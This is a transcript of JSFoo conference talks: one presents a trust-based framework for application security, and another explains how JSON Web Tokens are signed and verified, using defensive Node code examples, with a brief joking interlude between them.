So, for how many of you is this your first JSFoo? And who here is more than that: more than one year, second year, third year? Okay, good, so a lot of freshers. Hopefully you can enjoy the whole thing and tolerate the two of us for two days; we'll try not to trouble you too much, and like you, we're also developers trying to learn something. As I mentioned, our theme this time is security, but there's a good mixture of talks, right from front-end things to know all the way to GraphQL, so it's a good collection.

Our first speaker is Shyam. A fun fact: he was a core contributor to Angular in its initial versions, and he worked on the Angular version which we all liked, which was 1.x. A few years later they released Angular 2, and the next year they released Angular 4; you don't know where 3 went. Also, for the last nine months he's been working on a new framework which gives him trouble every night, and I think he'll be able to talk about that. Please welcome Shyam Seshadri on stage.

Good morning, folks. My name is Shyam Seshadri, and I'm here to talk about demystifying application security. Note that it's not demystifying web application security, and it's not demystifying JavaScript security: it's application security in general. So we'll cover XSS (cross-site scripting), CSRF (cross-site request forgery), JSON attacks, clickjacking, clickbaiting, PTSD, RSS... One of the reasons it's so hard to get started with security, and especially web security, is that there are so many security exploits. We saw this list; it's a very small portion of the OWASP Top 10, and there are plenty more (plus a few terms in there that weren't even related to security). Keeping on top of all of them is why it's so hard to deal with security.

So we won't do that. Instead, let's change the topic and talk about security in general, and how to think about it in a different manner. We won't go through a laundry list of "this is how you secure against this particular attack, this is how you worry about XSRF or CSRF." Instead, let's talk about how security has evolved and try to understand where the real threats are. The aim of this talk is to give you a thought framework for security in your application, one that will let you at least be aware of the threats and then decide, case by case, which ones you want to tackle and how. So if anything, I would call this talk "how to think about security." We'll focus on what we call attack vectors: the various ways you could make your application insecure. A warning, or caveat: this will include stuff not necessarily related to JavaScript. It's a more holistic approach to security, but that's what's needed when you start working on it.

Very quickly about me: I've worked at quite a few places. I started my career at Google, worked at Amazon, where I was also a security reviewer reviewing different applications, and headed engineering at Hopscotch. I've written a few books, again and again and again, on Angular: first version, second version, and so on. Currently I run two startups: one focused on consulting, basically rent-a-CTO for startups and the like, and my own product startup providing a B2B solution for FMCG companies. In all of this, security has been something that I have been
a part of, or a lead for, at various organizations, and that's where this thought process comes from. At Amazon I was reviewing applications that were going out to production, and this thought framework really helps ensure we get good coverage across an application.

Before we go deeper into that: life in the Stone Age, life before the internet, security was easy. You physically locked things down, provided access cards, and that was about it. No internet, nothing; life was easy. Then came Web 1.0, the era where I kind of grew up, where suddenly things were available on the internet and people sitting anywhere could access anything. Thankfully, this was still the day and age of server-rendered HTML. Browsers were dumb, useless, and annoying, but you had the first set of attack vectors: things like XSS and CSRF, which we're still dealing with today. And that was it. Browsers were dumb, there weren't that many attack vectors, you did the bare minimum and security was okay; and not enough data was fundamentally online yet, so it was still okay.

By the time we started figuring those out, Web 2.0 happened. Browsers became better, JavaScript engines became better, and, like the comic says, instead of Perl or regex I now have JavaScript, and that's just increased the number of problems I have. I love JavaScript, but it is a pain sometimes. What happened, basically, is we started saying: everything that we used to do on the server, let's put it on the client. It's faster, it doesn't have to make a server call. I can do validation there, I can do business logic, I can start doing access control. That's the path where you start doing everything that was the domain of the server on the client. Fair enough; maybe it is faster, a better experience for the user. But when we start doing these things solely on the client, that's where the problem really starts.

Of course, it wasn't enough that we had this JavaScript explosion of things you could do on the client; you also had an explosion of frameworks. I remember a JSFoo a few years back where everyone I talked to was either an Angular developer, a React developer, or a Backbone developer, and there were very few people who were JavaScript developers or front-end developers. Back-end developers aren't around anymore; who knows what happened to them. You had people who spent their time getting used to frameworks, and over time the responsibility for security, the question of who was responsible for security, kind of disappeared. Front-end developers were focused on getting their features and UI shipped, back-end developers were focused on providing the APIs, and no one was really talking or thinking about security. Unless, of course, something blew up, or unless security was so critical that it was baked in from day one. Otherwise, security is the last consideration we have, if it is a consideration at all.

So let's take a step back. Take a very standard client-server architecture, as basic as it can be: clients (web, Android, iOS) making server calls, multiple servers running, and a database. Very, very simplistic. Where are all the threats? Where do you consider yourself to be at risk in a setup like this? If you ask a security developer, they'll say every single line, every single box, everything is a threat. Which is true; anything could potentially be under attack. But I would put it to you that the real threat is when we start
copy-pasting code, when we stop understanding what's happening, when we start focusing on getting features out rather than understanding how things work, rather than understanding the true setup underneath.

So, going back to possible security exploits: it's very easy to say, okay, let's look at the OWASP Top 10, let's look at this list of security holes that were exploited in the last year. But I would put it to you that this is a non-scalable model. It's very hard to keep on top of every single security exploit, especially considering there's a new one every other day. So how do you deal with this? How do you build an application that is secure, while still setting yourself up for success, while doing the bare minimum threat assessment?

It all starts with trust. If there is one thing you take away from this talk, it's that you need to keep thinking about trust all the time: when you're building your application, when you're updating it, when you're adding a new feature. If you can think about trust, you'll go a long way towards securing your application. But trust is a tricky thing, so let's do a quick exercise. How many here, show of hands, would trust a guy that looks like this? No one really trusts a shady character; okay, good for you. But what about Batman? How many here would trust Batman? All right, quite a few comic book folks. Batman is trustworthy; you can always trust Batman. But what if Batman was really Superman? It's happened in the comics. Even the most trustworthy character, even the most trustworthy user in your system, may not be trustworthy.

If there's one thing you can do as a security developer, or as a JS developer who thinks about security, be like Mad-Eye Moody: constant vigilance. Don't trust anyone, don't trust anything. Because if you don't trust anything, it's hard to go wrong; it's very hard to be betrayed, to lose data, to have a security exploit. But how does that work in real life? It's easy to go around being paranoid (I'm pretty sure I could get a fake eye, attach it, and walk around like Mad-Eye Moody), but does that really work?

So instead, I say: don't look at security exploits, look at attack vectors, with trust being the most critical one. This goes across all the attack vectors; you'll see that in some way or another, most of them come back to trust. With that context, with that hat of trust (or tin foil, if you will), think about transmission: when data is being transmitted, is it secure? Think about storage: when and where data is stored, is that secure? Are you hashing, signing, cryptographically protecting data correctly? We'll talk about each of these as we go along. What about credentials? Notice that here we're not strictly in the domain of JavaScript; some of this is part of JavaScript, some is outside, but to be a complete developer you need to think about all of it. Libraries: in this day and age there's a library getting created every six seconds (probably not a true fact, but close enough). And audit logs. We'll talk about each one of these.

But again, the fundamental rule of security: don't trust. Especially your user, especially the person you're building your application for. Don't trust him, because that's where most security exploits start. And when he gives you data, trust that even less. Question every single data element: where is it coming from? Who's the originator: somebody from my company, or some external user? How was it transmitted, and was it transmitted securely? Where has it been stored,
and how has it been stored? When in doubt, don't trust it. And at the end of the day, while you can do all these things on the client (and we'll talk about some of them), it is just as critical on the server side that the server trusts the client even less than you do. So role-based authorization, user-based authorization, access control is a must; again, not trusting anything that the client says.

The flip side of that is convenience, and who here hasn't shipped something for the sake of a timeline? Agile programming: we all know that somewhere along the way, agile programming has become "let's ship things quickly, every week, every day," and God knows what happens to security. That bug you said nobody would ever hit, that code nobody would ever touch, that fix you added for just one week until you ship the next thing: it rarely disappears, and it will rarely be the case that it saves mankind. So don't rely on that.

So let's talk about trust. There are a lot of talks today and tomorrow which cover different aspects of this, going specifically into security, authentication, and identity; my role here is to be an MBA: talk about everything without actually going into the details of anything. So, trust. The source of the data: where is it coming from? Has it been mutated, or is it pristine; has somebody changed it? Where has it been stored? And most importantly, even if you don't know any of that: what is the impact of trusting it, what could happen because you trusted it? If you think about these things, you'll end up with what we call trust boundaries: supremely trustworthy data (I've never seen anything that is supremely trustworthy), somewhat trustworthy data, and completely untrustworthy data. User input is completely untrustworthy, so you do everything in your application to contain it, to make sure it can't go out of its zone to access data.

Identity: in web apps, relying on the client, on the user, to tell you who they are is like accepting this ID card. Who here would accept this ID card, just out of curiosity? Login is fundamentally the only time we ever ask the user who they are. If you're relying on the user, or the client, or the browser to tell you who they are by themselves, you're doing it wrong. Post-login, you rely on the server's own hash, something only the server knows, to reliably identify the user. And even after that, it's very easy to forget: when the user says "perform this action" (check out, add this item to cart, place an order, view the order details), you need to make sure that, one, the user is who he says he is; two, the user has access to the resource he wants to act on; and three, he can actually perform that action on that resource. If any one of these three checks is missing, I'd say it again: don't believe the client when he says "I want to check out this order." That's where most security holes start. So don't trust; going back to that same philosophy, do not trust the user.
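To make those three checks concrete, here is a minimal sketch of what they might look like as a server-side guard in Express-style Node. The route, the `orders` store, and the helpers (`getUserFromSession`, `checkout`) are hypothetical illustrations, not something from the talk:

```js
// Hypothetical Express route enforcing the three checks described above.
app.post('/orders/:orderId/checkout', async (req, res) => {
  // 1. Is the user who they say they are? (session established at login)
  const user = await getUserFromSession(req); // hypothetical helper
  if (!user) return res.status(401).send('Not authenticated');

  // 2. Does this user have access to this resource?
  const order = await orders.findById(req.params.orderId);
  if (!order || order.ownerId !== user.id) return res.status(403).send('Forbidden');

  // 3. Can this user perform this action on this resource?
  if (!user.permissions.includes('order:checkout')) return res.status(403).send('Forbidden');

  return res.json(await checkout(order)); // hypothetical business logic
});
```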
Then we come to transmission. Secure transmission in web apps: I've seen quite a few web apps, while auditing or just browsing, which do this crazy thing of saying, "I'm going to make my application so secure that I'll encrypt the JSON payload, do some cryptographic hashing, send it to the server, and the server will decrypt it. It's so secure." Really, what you're doing is reinventing HTTPS, and probably in a really, really bad way. Just use HTTPS. Or use secure WebSockets (WSS) if you're using WebSockets. Use accepted standards rather than reinventing the wheel for the sake of security. And secure not just the transmission but also the cookies, and who can access them. When data is being transmitted, make sure that only the client and the server are the two parties that can access that information, and no one else. Every non-secure transmission is a leak waiting to happen. You don't know where all your hops are, from your router to your ISP to finally your server, and any one of them being compromised means your data is compromised. So don't do it. (If you're not on HTTPS, Chrome will cry anyway, so it's a moot point. Use HTTPS.)

Then it comes to storage. With storage you need to think about what data is stored and where: is it stored in my database, is it stored on my client, and which parts of the data are stored where? The standard thing: you store it in the database, make a call, fetch it, send it down to the client. Well, what about on the client? Do you cache it, do you store it in local storage? If so, what data do you store, and what is the impact of someone else accessing that computer? You need to think about all of this when you start storing data, and not just in your database. Is it stored forever, or for a particular time? Here too, just like trust boundaries, you have different criticality levels of data: highly critical data like payment information and user information, versus, say, a cache of product listings and the like, which might not be as critical. The way you deal with each kind of data is very different. Assume the data will leak if it's stored there, and think about what would happen. If you're okay with that, it's probably not critical data; if you're not okay with that, you need to rethink how securely you're storing it. And in the end: who has access to it? Whether it's in your database, in your cache, or on the local machine or the phone: who has access, and how can they get at it? Can somebody else, some other browser, some other client, some other user, some other website, access the same data, and what would be the implications? So data is not as simple as "get the data, render it, cache it, move on." Think about what you're caching, where you're caching it, and how long you're caching it for.

Cryptography is the last thing we front-end developers usually think about, but if you're using it, don't reinvent the wheel. Just like HTTPS, use accepted, tested, validated libraries, OpenSSL and the like, rather than saying "I have figured out cryptographic hashing, and now I'm going to build my own RSA algorithm for public-key signing." Don't do it. Use secure, tested libraries.

Credentials and access: your AWS credentials, your database credentials. If you have access to them, or if your code needs access to them, think about where they're stored. Are they checked in? Are they in your code? Are they coming from configuration? And who has access to them? The philosophy of credentials is that they're never checked in, never available or searchable; they're need-to-know, and nobody needs to know, ever, except maybe that one person. So rotate your credentials, keep them secure, and don't check them into your code. Please don't check them into Git.
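As a minimal sketch of that "configuration, not code" idea: secrets read from the environment, so nothing sensitive lives in the repository. The variable names here are made up for illustration:

```js
// Credentials come from the environment (or a secrets manager), never from source.
const dbPassword = process.env.DB_PASSWORD;          // hypothetical variable name
const awsSecretKey = process.env.AWS_SECRET_ACCESS_KEY;

if (!dbPassword || !awsSecretKey) {
  // Fail fast instead of silently falling back to a hard-coded default.
  throw new Error('Missing required credentials in environment');
}
```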
Libraries: who here keeps the libraries they're using up to date, keeps updating their versions? How often: monthly? Who does it every six weeks? Anybody do it at least once a year? At least two out of seven hundred; not too bad. Maybe it's hard, it's annoying, and especially so if you keep waiting until you have to do it. If you're using Node, npm has come out with a nice way to check which libraries need to be updated for security reasons: `npm audit`. Make it hygiene: update your libraries, especially minor version upgrades. Keep doing it, don't wait too long, and keep an eye out for security disclosures (which no one ever will, so just keep updating). Small, regular updates are always better than one big, delayed one.

Finally, audit logs. Assuming you've done all of this (which you won't), assuming you've made your application super secure (which you won't be able to), you will still need to go back later, deep-dive, and see what happened, post facto. That's where audit logs come in. You need to know exactly what happened in your application and who did it, and by the time you need that, if you don't have it, it's too late. So think about audit logging from day one, and make sure it's comprehensive: make sure every action is covered, whether it's client-side calls, server-side actions, database mutations, and so on, so you know what is happening in your system and who is doing it. And make sure it's trustworthy. The worst kind of audit log is one that someone can go in and change: if a hacker gets access to your system, they shouldn't be able to mutate your logs. So think about immutable audit logs whenever you can.
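One possible shape for this, sketched under the assumption of an Express-style app and a hypothetical append-only `auditStore`:

```js
// Hypothetical middleware: append one immutable audit record per request.
app.use((req, res, next) => {
  auditStore.append({ // append-only store: no update/delete API exposed
    at: new Date().toISOString(),
    user: req.user ? req.user.id : 'anonymous',
    action: `${req.method} ${req.path}`,
    ip: req.ip,
  });
  next();
});
```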
So, taking a step back: we covered a whole bunch of attack vectors. Not all of them apply to every application, but fundamentally, think about these things. If the only question you keep asking after this talk is "do I trust X, do I trust Y," that's good enough. Do I trust the data from the server, from the client? And remember, you can't trust data just because it's coming from your database: how did it get into the database, and who was the originator? If I'm Amazon, marketplace data created by Amazon employees would be more trustworthy than third-party seller listings, so the source of the data matters as well. Do I need the entire data? The worst thing you can do is say "here's my database, here's my entire data set, send it down to the client." Think about whether you really need to send all of that information down. Can that data be cached? Should it be persisted? Is it secure in all aspects, while transmitting it and while storing it? And are you using the latest libraries? If you can do all of that, you'll be one step further in the fight for security. Thank you. Any questions at this point?

Q: I'm interested in knowing what laws government agencies have to nail down people who might have attempted to break such security...

A: Could you repeat that one more time? ...Audit logs, yeah. So, there are no great out-of-the-box solutions for audit logs. At our startup, for our own product, we created our own system which tracks all mutations at the database level; we have a separate system to log all server calls to see who did what at what point; and then we have a system running on top of that which looks for deviations from the norm. We have a baseline saying these are the kinds of actions expected, and any deviation from that is flagged. So we started with very basic logging and manual checking, and then we built an automated system on top of that to flag deviations. Very, very custom, built in-house; I haven't found a great out-of-the-box solution for it. Anything else?

Q: Most of the JavaScript code resides in the browser, right? Could you share some details about how the browser helps, or best practices we can use inside the browser to make things secure?

A: The browser already does a lot to make your application secure. Cross-domain requests are blocked by default unless you enable CORS, so you're more or less guaranteed that requests to your domain are generally coming from your own domain. Other than that, you still have the whole lot of XSS and CSRF attacks that you need to protect against; some frameworks, if you use them, do that for you automatically. But what it really comes down to is knowing and thinking about it. Take XSS itself: do you trust the data? If you genuinely can trust the data, XSS is not an issue; if you can't, you need to make sure you're using a framework that protects against it. Cross-site request forgery, again: different domains should not be able to make the call, should not be able to embed things, and so on. So the browser does a lot, but it's on us to know what else needs doing. It will not protect you with identity or access control; that's completely up to the developer to take care of in their own application. You need to define that boundary: what is taken care of by the browser, and what in my application do I need to take care of over and above that?

Q: Can you suggest an open-source tool, a one-stop solution, to test everything out?

A: I've not found a great free tool for that, but let's discuss after this.

Q: I'm trying to understand: as a developer, maybe issues are identified at later stages by QA, especially from the security perspective. Is there a tool which covers this, one that is also kept updated on the latest security bugs?

A: There are a few open-source tools; I can't remember their names, but start with the OWASP Top 10 itself. Starting from there will give you a list, and each item comes with tools for testing it. There are also libraries and frameworks which give you complete testability and all that, but those are usually paid.

Q: I think we were primarily focusing on web applications. When we come to mobile applications, it's a different ballgame, right? So many things reside inside the mobile itself. What are the main things you would look for in mobile application security?

A: It doesn't fundamentally change. This is application security, so you're still asking: what data can I store on the client? Whether the client is a browser or a mobile app doesn't change that. I might not want to store my user's credit card information on the mobile even if it's encrypted, because I'd be encrypting it on the client itself. Access control: the problems don't change. A lot of these attack vectors remain the same whether it's the browser, an Android device, or an iOS device. Yes, each device has its own technicalities of what can be accessed or not, but go by the rule of thumb: don't trust, keep it minimal, and you won't go wrong.

Q: You said don't reinvent the wheel when it comes to cryptography. What are your thoughts about using standard cryptography in conjunction with some of your own custom logic?
A: The question is: what are you trying to do with the custom logic? What additional benefit does it offer over the existing cryptographic libraries, and over the security you already get from transmitting over HTTPS or WSS?

Q: I'm specifically talking about the cryptography. Say you're using RSA, but you know RSA could have its own set of exploits. If you add some custom logic on top, you might eliminate that possibility.

A: So the question becomes: would one developer, or ten developers, be able to do better than a library contributed to by so many developers over so much time? If it gives you peace of mind, go for it.

Q: You say trust is the main point, that trust is the main thing where we have to check the boundaries. From the customer angle, what domain-specific or product-specific things should we include in terms of security, and at what point: during the requirements stage, or how?

A: Could you repeat the first part? I got most of the last part... So again: trust. When I say "don't trust the client," it's not that you don't take his input or don't deal with him at all. Take his input, but do whatever you can in your application to validate and secure the data. When you take input from the user and have to display product listings in HTML, make sure you're secured against XSS. It's also about how that data will be stored and how it will be used. The scary case is taking data and directly displaying it later in some other part of the app without securing it; that's untrustworthy. For the most part, taking data from the user is fine if you're not rendering it as HTML and such. Trust boundaries really come down to saying: I can take data, but it has to be treated in a certain way when someone uses it, and any consumer of that data later should be aware of where it came from and how it can safely be used. That's where trust boundaries come in.

[Emcee] Let's take more questions after some time; we have to move on. Thanks, guys. For those of you who couldn't ask, we have a joint Q&A with the first three speakers at the end of the third talk, so you can save your questions for then. Wow, the crowd is awesome: 700-plus people. And there are people standing when there are so many seats here, so please take them. That sounded like a college professor.

So I realized one thing: since both of us weren't invited to speak (rather, our proposals for JSFoo weren't accepted), this is a very nice time to give a talk, because it's the second slot, everyone's present, and there are 700 people. We've also made one presentation, the both of us combined. You're going to have people telling you about the cool things they do in their companies; our presentation is going to be the exact opposite. Hopefully you like it. What do you think are the best ways to break production at the office? Any answers? Okay, so our talk is very simple, it's very short (hopefully you like it), and it's a stepwise approach: four simple rules.
If you follow these, it is definitely going to happen. Okay, let's get started with our first rule of how to break production.

Rule one: release fast. We always get new updates, we always crave updates, so one of the best rules for breaking production is: release fast, add more technical debt to your source code, and treat every feature you're working on as if it should have been released yesterday. That's how offices work, that's how everything works. Rule two: don't review code, because bad code is a state of mind. I don't write bad code; someone else just thinks I write bad code. If you have direct access to your master branch, this is really easy. Rule three: testing. You test it; if it works for you, it should work for everyone. Simple rule. If you're not sure how to achieve this, just remember: if it works on local, it has to work on production, no questions. And then the most important rule, even if you do all of the above; this one is my favorite: release on Friday evening. How many of you do this, honestly? Wow, nice. Then you'll get that one call you've always wanted, the one you've been planning for all these days: your PagerDuty alert, or someone saying that something's broken. So, four steps. Try them out; don't blame me if it doesn't work. Now you know why our talk was rejected: based on these standards, you know why we didn't get the call.

A couple of announcements: there's a design workshop starting at 10 a.m. in the Meta Refresh track, in auditorium three. Now, back to some real quality speakers. Our next speaker does a lot of knowledge sharing on YouTube; if you're a junior developer, or a developer who's just starting out, you can learn a lot in different fields, around JavaScript, around React, from him. I know him mostly because of bundlesize, one of the libraries he's made. Another fun fact many of you don't know: he's actually a physicist. The stage is yours.

All right. It's okay. Cool. All right, this is super loud, give me a second. Okay, much better. Thanks for the intro. Yeah, it's true, I am a physicist. I don't admit it too often, because then people don't take me seriously; because if you didn't even study computer science, are you a real developer?

Anyway, I'm going to talk about what makes JSON Web Tokens secure. I think the previous speaker already said this, but when you're building front-end applications there are so many things to think about: routing, performance, animations, keeping up with React. There's a bunch of things you have to do, and often security takes a back seat. Which is obviously not cool, but it always happens. And there are multiple methods of securing your applications: you can use cookies, tokens, handle them in different ways, have no sessions, do it only server-side, use JSON Web Tokens and such. But the thing is, security is difficult. It's a tough topic, and it's not super accessible to learn. So I'll talk about one of the popular methods of authentication, which is JSON Web Tokens. I tend to prefer JSON Web Tokens because they're not super difficult to implement (even non-computer-science geeks like me can understand them), but they're still secure at the same time. So, who am I?
I'm Siddharth. I work for this company called Auth0. Auth0 is an authentication and security company; the pitch is, if you don't have security engineers, outsource it, or rather, use tools that already do it for you. Tiny pitch. I'm on Twitter, where I post garbage all the time, and I also run this side thing I call Frontend Army, where I do training: mostly front-end stuff, mostly React these days. Cool, back to JSON Web Tokens.

JSON Web Tokens (I'm just going to call them JWTs) are actually an open standard. The spec was written by a few folks from Microsoft and people around them, and it's open, so you can read it. It's surprisingly short. They built it for a different reason, but it's been repurposed on the web for authentication, or I should say authorization. The first use case they actually built it for was information exchange: JWTs are a great way of transmitting information between parties. They can be signed, you can use public/private key pairs, so the idea is you're always sure of who sent you the message; if there's an attacker in between, you'll probably find out. And then it's been repurposed on the web for authorization: for a logged-in user, you want to figure out whether this is actually the user, or somebody else in between, an attacker or tampered data. Should I give access to this route, this service, this API?

Here's a snapshot of the problem it tries to solve. You have your user and your API server; that's the original connection. But sometimes somebody steals the token, or somebody impersonates your user: that's the attacker. Sometimes it's a man-in-the-middle attack, tampering with your network. Your API server needs to be sure: is this my user, or is this someone else? That's the problem JWTs aim to solve. They do it with something called stateless sessions: the session need not be stored in your database the way cookie sessions are; it can just live on the client side and get passed around. This leads to some interesting vulnerabilities and also some interesting features, and I'm going to talk about both.

But to understand how JWTs are actually secure (because if the token lives on the client, it's visible, right? Somebody could write a Chrome extension and just steal it), we need to understand the structure of a JWT. It has three parts: the header, the payload, and the signature. The header and payload are basically JSON dumps. This is what a token looks like, all gibberish hash-looking stuff; I've color-coded it so it looks pretty on black, but mostly to show which part is the header and which is the payload. You can also have JWTs without a signature; that's supported by the spec. It's not useful for security purposes, but it exists, and it becomes important later.

The header is the metadata about the token. There's only one mandatory field, the algorithm, `alg`. Some of the nicer algorithms you can use are HS256 and RS256, and you can also use `none`, which is the "no security" option.
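The slides aren't reproduced in this transcript, but a decoded header and payload are just JSON objects along these lines (the values are illustrative, reusing the talk's examples):

```js
// Decoded JWT header: metadata about the token.
const header = { alg: 'HS256', typ: 'JWT' };

// Decoded JWT payload: the claims being made.
const payload = {
  sub: '1234567890', // subject
  name: 'John Doe',  // custom claim
  admin: false,      // custom claim
};
```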
There are multiple other fields. You can specify the type (the type is always JWT for us), and you can specify the content type: is the payload a JSON object, or is it itself another JWT? (You can have nested tokens.) But for the most part, this is enough. Then, to produce that hash-looking thing, the header is JSON-stringified and then base64url-encoded. That makes it safe for the web: all the odd characters get encoded away so the value can be passed around. And this is what it looks like. Again, it's only encoded, not encrypted, which means if somebody has it, they can base64-decode it and get back the JSON object. They can see your metadata; it's out there.

Next is the payload. The payload is the message you're trying to send. It can have any fields you want; these are the canonical ones. You have `sub`, the subject. You have the issuer, `iss`: which service issued this token. It could be your own authentication server, it could be the same API, it could be a third party like Auth0. You have the intended audience, `aud`, for the token; for example, "this token is only useful for the cart API," and any other API it's used against should reject it. You have the expiry and the issued-at time, both datetimes. And then you can have any number of custom fields; here I have the name "John Doe" and whether the user is an admin or not. I'm going to strip everything else; this is the useful part for my talk. Then you do the same thing: stringify, encode, and you get this ugly hash-looking string. Again, it's encoded, not encrypted: anyone holding it can decode and read it. So the key rule is: only put session information in here. Don't put secrets like a password or credit card info, because anybody can decode this. And if third parties can read it, is this even a good authorization mechanism? That's where the signature comes in, the most interesting part.

To create a signature you need the header, the payload, a shared secret (for HS256), and the algorithm you're using; the signature is a function of all of these. The secret is the most important part. It's not like the password you use for your Gmail account; it has to have much more entropy. The recommendation is to use a 256-bit secret, like this one. And you obviously don't hard-code it: I'm going to read it from the process here, stored as an environment variable, so that it doesn't accidentally get committed to GitHub. It sounds silly to say this, but it has happened, and companies have gone down because of it. So it's worth mentioning.

To create the signature you can use the crypto library; it's built in. ("Crypto" here stands for cryptography, not cryptocurrency; sadly, I have to say that these days.) You create an HMAC (HMAC stands for hash-based message authentication code) and use SHA-256 to create the digest. You pass the content, which is the concatenated string of your encoded header and payload, digest it, and base64url-escape the result so you can pass it around the web, and you get this hash. Now, this is not mere encoding: it's a keyed cryptographic hash, an HMAC, which means it's one-way.
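Putting those steps together, here's a hand-rolled signing sketch in Node (it assumes Node 15.7+ for the `'base64url'` encoding and a 256-bit secret in a `JWT_SECRET` environment variable):

```js
const crypto = require('crypto');

// JSON-stringify, then base64url-encode (encoded, NOT encrypted).
const base64url = (obj) =>
  Buffer.from(JSON.stringify(obj)).toString('base64url'); // Node 15.7+

const encodedHeader = base64url({ alg: 'HS256', typ: 'JWT' });
const encodedPayload = base64url({ sub: '1234567890', name: 'John Doe', admin: false });

// HMAC-SHA256 over "header.payload" with the shared secret: one-way, keyed.
const secret = process.env.JWT_SECRET; // never hard-coded
const signature = crypto
  .createHmac('sha256', secret)
  .update(`${encodedHeader}.${encodedPayload}`)
  .digest('base64url');

// The token is the three parts joined by dots.
const token = `${encodedHeader}.${encodedPayload}.${signature}`;
```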
If you have the signature, you can't reverse it to see what's inside unless you have the shared secret; this is where all the magic happens. With it, you can always answer: have the contents of this message been manipulated? Admin was false; did somebody change it to true? We'll look at how. But first: the token is just these three things concatenated, header, payload, signature, separated by dots. That's what it looks like.

To do all of this you can, of course, use a library, and there are millions of them. As Shyam said, find a trustworthy one. This one is called jsonwebtoken. It has over a million downloads a week, and a good bunch of my coworkers work on it, so I know it's solid; use this one. (Whoa, is that the timer? Okay, I thought I was out of time.) With jsonwebtoken you import it and sign: pass the payload, the secret, and the algorithm, and it gives you the whole token. It's just a nicer API: `sign(payload, secret, options)` and you're done. There's also a playground crafted by Auth0 at jwt.io. You can paste in your token, and if you supply the secret as well, it will decode and check it for you; or you can put in the data and secret and encode it. It's a good way to test your implementation while developing.

So, how do you use a JWT? Whenever the user wants to access a protected resource on an API, the browser sends the token in the Authorization header. It doesn't rely on cookies; it relies on headers, which is kind of important. The first request goes to your authorization server (again, this could be your own server or a third party like Auth0). You send the credentials, you get a token back: this is the document you'll use for the API. You send it to the API; you're no longer sending the credentials, only the token. The API can verify that the token is valid and send you back the data.

How does the API server verify the token? That's the important part. You take this whole big token, split by the dots. The header and payload are just encoded, so you base64url-decode and JSON-parse them, and you get the data inside: you see which algorithm was used, and you see the payload. But you still have to verify: has this payload been tampered with? Is this really coming from the original user? To do that, you simply create the signature again. The server has the secret and knows the algorithm; the attacker, and the client, don't. Only the authentication server and the API server know the secret, nobody in between. So the token is passed along, and the API server at the end verifies it by recomputing the signature. If the computed signature matches the signature part of the token, you know it's legit; if not, something shady happened in between.

Again, you can use the same library: call verify, give it the client's token, the secret, and the whitelist of algorithms this API supports. The whitelist is optional in the spec, but you should always give it; I'll show you why soon. Then you get a callback (a promise works too): if it errors out, the token has been tampered with; if it doesn't, you get the data and carry on. Cool.
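A minimal sketch of that round trip with the jsonwebtoken package, with the secret again assumed to live in `JWT_SECRET`:

```js
const jwt = require('jsonwebtoken');
const secret = process.env.JWT_SECRET;

// On the authorization server: sign.
const token = jwt.sign({ sub: '1234567890', admin: false }, secret, {
  algorithm: 'HS256',
});

// On the API server: verify, always with an explicit algorithm whitelist.
jwt.verify(token, secret, { algorithms: ['HS256'] }, (err, decoded) => {
  if (err) {
    // Tampered, expired, or signed with a non-whitelisted algorithm.
    console.error('Rejecting token:', err.message);
    return;
  }
  console.log('Verified claims:', decoded);
});
```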
So again: you can read the contents of the token, but if you don't know the secret, you can't change it; you can't really tamper with it. Quick example: this is the payload, admin is false, and this is the token. If I change admin to true, the payload part changes, but without the secret I can't recompute the signature. Which means on the server, when you verify, the signature won't match, you know something shady has happened, and you reject it.

Okay, let's talk about the signing algorithms. The first one supported by the spec is `none`: no signature. You call `jwt.sign`, give the payload, give null as the secret, and say "don't use any algorithm." Please don't use that. Use something like HS256, which uses a shared secret; way more secure than none, of course. You give the payload, the secret, and the algorithm; to verify, you take the client's token, pass your shared secret, and pass the algorithm whitelist.

Then there's RS256, which is slightly more secure because it relies on a public/private key pair. The interesting part is that signing requires the private key: the authentication server needs the private key to create the token, which goes to the client, which passes it to the API server. The API server doesn't need the private key, only the public key, which means there's one less thing to protect. Only the authentication server has to guard the private key; you don't have the secret sitting on multiple servers. And by virtue of its name, the public key is public: anyone can grab it, you've probably even put it on GitHub. The fun part is that the attacker can verify that your token is valid, but still can't change it. They can see the public key but can't do anything with it unless they have the private key. So it's all cool.

The last one is ES256, a slightly more interesting take on RS256. It also uses a public/private key pair, but the keys are typically smaller, and so the signature created with them is also smaller. The network payload you have to send (remember, this token travels in a header) is therefore smaller, making it slightly more performant over the network. If you're dealing with bad networks, that's really useful. The trade-off is that it's slower in comparison; actually, not slightly: at least five times slower in typical benchmarks. So if you have plenty of CPU but your users are on weak internet, you can use ES256 over RS256.
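Here's roughly what that RS256 split looks like with jsonwebtoken; the PEM file paths are hypothetical:

```js
const fs = require('fs');
const jwt = require('jsonwebtoken');

// Authorization server: the ONLY machine that holds the private key.
const privateKey = fs.readFileSync('./keys/auth-server-private.pem'); // hypothetical path
const token = jwt.sign({ sub: '1234567890', admin: false }, privateKey, {
  algorithm: 'RS256',
});

// API server: verification needs only the public key, which can be shared freely.
const publicKey = fs.readFileSync('./keys/auth-server-public.pem');
const claims = jwt.verify(token, publicKey, { algorithms: ['RS256'] });
```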
Cool. Cookies. Cookies are the more popular authentication method, so I want to do a quick comparison. With cookies, you typically need a database: you have to store the session somewhere. With JWTs, we don't actually store it; we just pass the token around in the header. That makes JWTs stateless. If you're storing sessions in a database, then for every request you also have to query the database: extra work for the server, extra requests, extra time. JWTs, being stateless, don't have that cost.

Cookies are vulnerable to CSRF, cross-site request forgery: an attacker tricks the browser into thinking a request is coming from the same website when it's not, and rides on your cookies. JWTs are not vulnerable to CSRF because they don't use cookies. But don't get too excited: they are vulnerable to XSS, which affects both tokens and cookies. I'll talk about that soon. Sessions can be invalidated on demand with cookies: because you store the session, you can delete it or flag it as invalid. With JWTs, because you don't store them, you can't really do things like remote logout. So the good practice is to always set an expiration: give an expiry datetime, don't create everlasting tokens. Create really short-lived tokens that expire on their own; they keep expiring and you keep generating new ones. It's also worth saying that JWTs can be used as cookies: they're just strings, so you can store one in a cookie. You lose all these benefits, but if instant remote logout is super important to you, or you really rely on cookies for some reason, you can carry the same token in a cookie. That totally works.

Cool. So, the important security question: can JWTs be hacked? Like everything else: yes. The JWT spec is bulletproof, it's a really good spec, but a weak implementation can get you hacked. JWTs get a bad rep sometimes: you see articles criticizing them as a shoddy authentication method, because implementing them is super easy, but implementing them the right way requires a lot more careful effort. It's super easy to get started, and then you have to follow some rules to make it bulletproof. It's a lot like CSS: getting started looks easy, it's just simple syntax, but by day three you've completely screwed yourself.

